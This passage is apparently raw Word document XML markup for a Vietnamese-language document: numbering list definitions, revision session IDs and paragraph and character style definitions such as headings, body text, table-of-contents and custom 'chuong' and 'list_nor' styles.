        <w:sz w:val="26"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%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48F73CE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4CD4D1C2"/>
    <w:lvl w:ilvl="0">
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="listnor"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="927" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="space"/>
      <w:lvlText w:val="%2.%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7DAB6A15"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10AA906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F48359C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D94CF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0210269">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1556508909">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1822768391">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="557060535">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="899941904">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1955209316">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="722020969">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2062047161">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="290791243">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="426971713">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="350184793">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="651452013">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1644920252">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1411123428">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="292255837">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="441998169">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2104568378">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="28648972">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="327025104">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="583221659">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="84617048">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="763502558">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2030791313">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="18876440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7E1"/>
    <w:rsid w:val="00007893"/>
    <w:rsid w:val="00010541"/>
    <w:rsid w:val="00015A3E"/>
    <w:rsid w:val="000164B9"/>
    <w:rsid w:val="00022ADA"/>
    <w:rsid w:val="00026BE1"/>
    <w:rsid w:val="0003159B"/>
    <w:rsid w:val="0003623F"/>
    <w:rsid w:val="00036325"/>
    <w:rsid w:val="00044C71"/>
    <w:rsid w:val="00052DB1"/>
    <w:rsid w:val="000545D3"/>
    <w:rsid w:val="000774CB"/>
    <w:rsid w:val="000A54C5"/>
    <w:rsid w:val="000B07F7"/>
    <w:rsid w:val="000C1254"/>
    <w:rsid w:val="000F4AA8"/>
    <w:rsid w:val="001224B7"/>
    <w:rsid w:val="001430E0"/>
    <w:rsid w:val="00153447"/>
    <w:rsid w:val="001620D1"/>
    <w:rsid w:val="0017031B"/>
    <w:rsid w:val="001739C4"/>
    <w:rsid w:val="00197171"/>
    <w:rsid w:val="001A486E"/>
    <w:rsid w:val="001B37E5"/>
    <w:rsid w:val="001B7593"/>
    <w:rsid w:val="001E0D8C"/>
    <w:rsid w:val="00201D97"/>
    <w:rsid w:val="00204B45"/>
    <w:rsid w:val="002052C6"/>
    <w:rsid w:val="00212603"/>
    <w:rsid w:val="00220D25"/>
    <w:rsid w:val="002244F4"/>
    <w:rsid w:val="00286039"/>
    <w:rsid w:val="00286CB3"/>
    <w:rsid w:val="00287933"/>
    <w:rsid w:val="002B05A6"/>
    <w:rsid w:val="002B4188"/>
    <w:rsid w:val="002B4385"/>
    <w:rsid w:val="002B473D"/>
    <w:rsid w:val="002B5979"/>
    <w:rsid w:val="002B7D2C"/>
    <w:rsid w:val="002D4461"/>
    <w:rsid w:val="002E595E"/>
    <w:rsid w:val="002F52EA"/>
    <w:rsid w:val="002F69C0"/>
    <w:rsid w:val="003006E9"/>
    <w:rsid w:val="00314655"/>
    <w:rsid w:val="00320CB9"/>
    <w:rsid w:val="003232A1"/>
    <w:rsid w:val="0033130B"/>
    <w:rsid w:val="00335854"/>
    <w:rsid w:val="00363DC8"/>
    <w:rsid w:val="00382B4B"/>
    <w:rsid w:val="003921B6"/>
    <w:rsid w:val="003B15FC"/>
    <w:rsid w:val="003B799D"/>
    <w:rsid w:val="003D12D0"/>
    <w:rsid w:val="003D225F"/>
    <w:rsid w:val="003F402A"/>
    <w:rsid w:val="003F515D"/>
    <w:rsid w:val="00410860"/>
    <w:rsid w:val="004134B2"/>
    <w:rsid w:val="0041519C"/>
    <w:rsid w:val="0041732A"/>
    <w:rsid w:val="00421A84"/>
    <w:rsid w:val="00424259"/>
    <w:rsid w:val="004271E0"/>
    <w:rsid w:val="0043452B"/>
    <w:rsid w:val="00452426"/>
    <w:rsid w:val="00453B83"/>
    <w:rsid w:val="00453DD2"/>
    <w:rsid w:val="00465508"/>
    <w:rsid w:val="004708C0"/>
    <w:rsid w:val="00482F63"/>
    <w:rsid w:val="00487E56"/>
    <w:rsid w:val="004908F6"/>
    <w:rsid w:val="00491C76"/>
    <w:rsid w:val="00495567"/>
    <w:rsid w:val="004A29AB"/>
    <w:rsid w:val="004B6496"/>
    <w:rsid w:val="004C028A"/>
    <w:rsid w:val="004E1A4E"/>
    <w:rsid w:val="004E2336"/>
    <w:rsid w:val="004E27B9"/>
    <w:rsid w:val="004F51CB"/>
    <w:rsid w:val="004F6637"/>
    <w:rsid w:val="004F7BA7"/>
    <w:rsid w:val="00504BF4"/>
    <w:rsid w:val="005062A7"/>
    <w:rsid w:val="00507492"/>
    <w:rsid w:val="0053157E"/>
    <w:rsid w:val="00536E2D"/>
    <w:rsid w:val="005415E6"/>
    <w:rsid w:val="00573972"/>
    <w:rsid w:val="00577391"/>
    <w:rsid w:val="00584585"/>
    <w:rsid w:val="005850AD"/>
    <w:rsid w:val="00586892"/>
    <w:rsid w:val="0059001B"/>
    <w:rsid w:val="005B01F7"/>
    <w:rsid w:val="005E6DF6"/>
    <w:rsid w:val="00640032"/>
    <w:rsid w:val="00671F8E"/>
    <w:rsid w:val="006816D5"/>
    <w:rsid w:val="00690E86"/>
    <w:rsid w:val="00692AD6"/>
    <w:rsid w:val="006936EF"/>
    <w:rsid w:val="00695A6C"/>
    <w:rsid w:val="00695BEE"/>
    <w:rsid w:val="006A3013"/>
    <w:rsid w:val="006C20D6"/>
    <w:rsid w:val="006E2BFD"/>
    <w:rsid w:val="006F4E96"/>
    <w:rsid w:val="00704A61"/>
    <w:rsid w:val="00724A16"/>
    <w:rsid w:val="00727378"/>
    <w:rsid w:val="00727AA1"/>
    <w:rsid w:val="00771EDA"/>
    <w:rsid w:val="007922E0"/>
    <w:rsid w:val="007B6ECE"/>
    <w:rsid w:val="007B7717"/>
    <w:rsid w:val="007E38B5"/>
    <w:rsid w:val="007E520D"/>
    <w:rsid w:val="007E65A2"/>
    <w:rsid w:val="007E7109"/>
    <w:rsid w:val="007F5C24"/>
    <w:rsid w:val="007F6794"/>
    <w:rsid w:val="007F6886"/>
    <w:rsid w:val="007F7951"/>
    <w:rsid w:val="008055DA"/>
    <w:rsid w:val="00813D9B"/>
    <w:rsid w:val="00817518"/>
    <w:rsid w:val="00824775"/>
    <w:rsid w:val="00826F7F"/>
    <w:rsid w:val="008270F1"/>
    <w:rsid w:val="00841FE2"/>
    <w:rsid w:val="0084767F"/>
    <w:rsid w:val="008476AD"/>
    <w:rsid w:val="00853551"/>
    <w:rsid w:val="00863D2F"/>
    <w:rsid w:val="00864F73"/>
    <w:rsid w:val="00872074"/>
    <w:rsid w:val="00884516"/>
    <w:rsid w:val="008A233C"/>
    <w:rsid w:val="008A2D29"/>
    <w:rsid w:val="008B7CDE"/>
    <w:rsid w:val="008C6FBD"/>
    <w:rsid w:val="008D58A8"/>
    <w:rsid w:val="008E01AC"/>
    <w:rsid w:val="008F6945"/>
    <w:rsid w:val="00930E2F"/>
    <w:rsid w:val="009410DD"/>
    <w:rsid w:val="00972A87"/>
    <w:rsid w:val="009823E1"/>
    <w:rsid w:val="0099472A"/>
    <w:rsid w:val="009B7F07"/>
    <w:rsid w:val="009C2F83"/>
    <w:rsid w:val="009C66BE"/>
    <w:rsid w:val="009D67A9"/>
    <w:rsid w:val="009D772B"/>
    <w:rsid w:val="009E0111"/>
    <w:rsid w:val="009E54E1"/>
    <w:rsid w:val="009F2546"/>
    <w:rsid w:val="00A01053"/>
    <w:rsid w:val="00A04E7A"/>
    <w:rsid w:val="00A13819"/>
    <w:rsid w:val="00A30404"/>
    <w:rsid w:val="00A55D11"/>
    <w:rsid w:val="00A811F9"/>
    <w:rsid w:val="00A95152"/>
    <w:rsid w:val="00A955A0"/>
    <w:rsid w:val="00A977E1"/>
    <w:rsid w:val="00AA5398"/>
    <w:rsid w:val="00AB6FDD"/>
    <w:rsid w:val="00AC278E"/>
    <w:rsid w:val="00AC5DF6"/>
    <w:rsid w:val="00AD11E6"/>
    <w:rsid w:val="00AD1E49"/>
    <w:rsid w:val="00AD7DD6"/>
    <w:rsid w:val="00AE74B2"/>
    <w:rsid w:val="00AF3C80"/>
    <w:rsid w:val="00AF5059"/>
    <w:rsid w:val="00B0089A"/>
    <w:rsid w:val="00B04D60"/>
    <w:rsid w:val="00B106C3"/>
    <w:rsid w:val="00B17882"/>
    <w:rsid w:val="00B3514A"/>
    <w:rsid w:val="00B427E4"/>
    <w:rsid w:val="00B50454"/>
    <w:rsid w:val="00B70927"/>
    <w:rsid w:val="00BA30FA"/>
    <w:rsid w:val="00BA51C8"/>
    <w:rsid w:val="00BD7450"/>
    <w:rsid w:val="00C05E16"/>
    <w:rsid w:val="00C20F4D"/>
    <w:rsid w:val="00C32400"/>
    <w:rsid w:val="00C42C6C"/>
    <w:rsid w:val="00C44487"/>
    <w:rsid w:val="00C50BFB"/>
    <w:rsid w:val="00C5162B"/>
    <w:rsid w:val="00C51B4A"/>
    <w:rsid w:val="00C548AC"/>
    <w:rsid w:val="00C5561B"/>
    <w:rsid w:val="00C673C6"/>
    <w:rsid w:val="00C7275D"/>
    <w:rsid w:val="00C813EA"/>
    <w:rsid w:val="00C9186E"/>
    <w:rsid w:val="00CA45BC"/>
    <w:rsid w:val="00CA7D20"/>
    <w:rsid w:val="00CB2369"/>
    <w:rsid w:val="00CB5DB7"/>
    <w:rsid w:val="00CB76EB"/>
    <w:rsid w:val="00CD7999"/>
    <w:rsid w:val="00CD79CE"/>
    <w:rsid w:val="00CE45D9"/>
    <w:rsid w:val="00CE751E"/>
    <w:rsid w:val="00D007B0"/>
    <w:rsid w:val="00D10B4E"/>
    <w:rsid w:val="00D124E1"/>
    <w:rsid w:val="00D27793"/>
    <w:rsid w:val="00D2786A"/>
    <w:rsid w:val="00D345B6"/>
    <w:rsid w:val="00D36A34"/>
    <w:rsid w:val="00D37F05"/>
    <w:rsid w:val="00D47064"/>
    <w:rsid w:val="00D64E0A"/>
    <w:rsid w:val="00D666FE"/>
    <w:rsid w:val="00D709F1"/>
    <w:rsid w:val="00D70A7B"/>
    <w:rsid w:val="00D81B1F"/>
    <w:rsid w:val="00D9170A"/>
    <w:rsid w:val="00D94C11"/>
    <w:rsid w:val="00DB467F"/>
    <w:rsid w:val="00DC5DB2"/>
    <w:rsid w:val="00DD1DE0"/>
    <w:rsid w:val="00DE21B5"/>
    <w:rsid w:val="00DE4E85"/>
    <w:rsid w:val="00DF5075"/>
    <w:rsid w:val="00E07FBD"/>
    <w:rsid w:val="00E43C40"/>
    <w:rsid w:val="00E45A5B"/>
    <w:rsid w:val="00E561CB"/>
    <w:rsid w:val="00E57538"/>
    <w:rsid w:val="00E706D1"/>
    <w:rsid w:val="00E96BDF"/>
    <w:rsid w:val="00E96D31"/>
    <w:rsid w:val="00EA079F"/>
    <w:rsid w:val="00EB7207"/>
    <w:rsid w:val="00EC7C59"/>
    <w:rsid w:val="00EE0942"/>
    <w:rsid w:val="00EE289D"/>
    <w:rsid w:val="00EF7A00"/>
    <w:rsid w:val="00F133D8"/>
    <w:rsid w:val="00F133F0"/>
    <w:rsid w:val="00F134D9"/>
    <w:rsid w:val="00F14759"/>
    <w:rsid w:val="00F22E93"/>
    <w:rsid w:val="00F33296"/>
    <w:rsid w:val="00F334B9"/>
    <w:rsid w:val="00F51078"/>
    <w:rsid w:val="00F5457E"/>
    <w:rsid w:val="00F64263"/>
    <w:rsid w:val="00F7146E"/>
    <w:rsid w:val="00F87DE3"/>
    <w:rsid w:val="00FA4830"/>
    <w:rsid w:val="00FA6802"/>
    <w:rsid w:val="00FB3175"/>
    <w:rsid w:val="00FB31EF"/>
    <w:rsid w:val="00FB4013"/>
    <w:rsid w:val="00FB4AA9"/>
    <w:rsid w:val="00FC61AA"/>
    <w:rsid w:val="00FD7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8172E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{35F7B6EE-D8B4-4054-AC37-EDF94866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8B5"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="567"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00EB7207"/>
    <w:pPr>
      <w:keepNext/>
      <w:numPr>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FD7DC1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="7"/>
      </w:numP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70A7B"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="7"/>
      </w:numPr>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading4Char"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00026BE1"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="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26BE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26BE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26BE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26BE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6BE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207"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman Bold" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BodyTextChar"/>
    <w:rsid w:val="00CB2369"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii=".VnTime" w:hAnsi=".VnTime"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BodyTextChar">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText"/>
    <w:rsid w:val="00CB2369"/>
    <w:rPr>
      <w:rFonts w:ascii=".VnTime" w:eastAsia="Times New Roman" w:hAnsi=".VnTime" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00EB7207"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading2Char">
    <w:name w:val="Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00FD7DC1"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00D70A7B"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cstheme="majorBidi"/>
      <w:b/>
      <w:i/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00286039"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00201D97"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B37E5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001B37E5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B37E5"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="001B37E5"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Bibliography">
    <w:name w:val="Bibliography"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="37"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000164B9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="0"/>
      </w:numPr>
      <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b w:val="0"/>
      <w:bCs w:val="0"/>
      <w:caps w:val="0"/>
      <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="260"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="520"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003B15FC"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="chuong">
    <w:name w:val="chuong"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="chuongChar"/>
    <w:qFormat/>
    <w:rsid w:val="003F515D"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:hAnsi="Times New Roman Bold"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:szCs w:val="26"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="chuongChar">
    <w:name w:val="chuong Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="chuong"/>
    <w:rsid w:val="003F515D"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman Bold" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman Bold" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="listnor">
    <w:name w:val="list_nor"/>
    <w:basedOn w:val="ListParagraph"/>
    <w:link w:val="listnorChar"/>
    <w:qFormat/>
    <w:rsid w:val="00B70927"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:rsid w:val="00B70927"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="listnorChar">
    <w:name w:val="list_nor Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="listnor"/>
    <w:rsid w:val="00B70927"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="26"/>
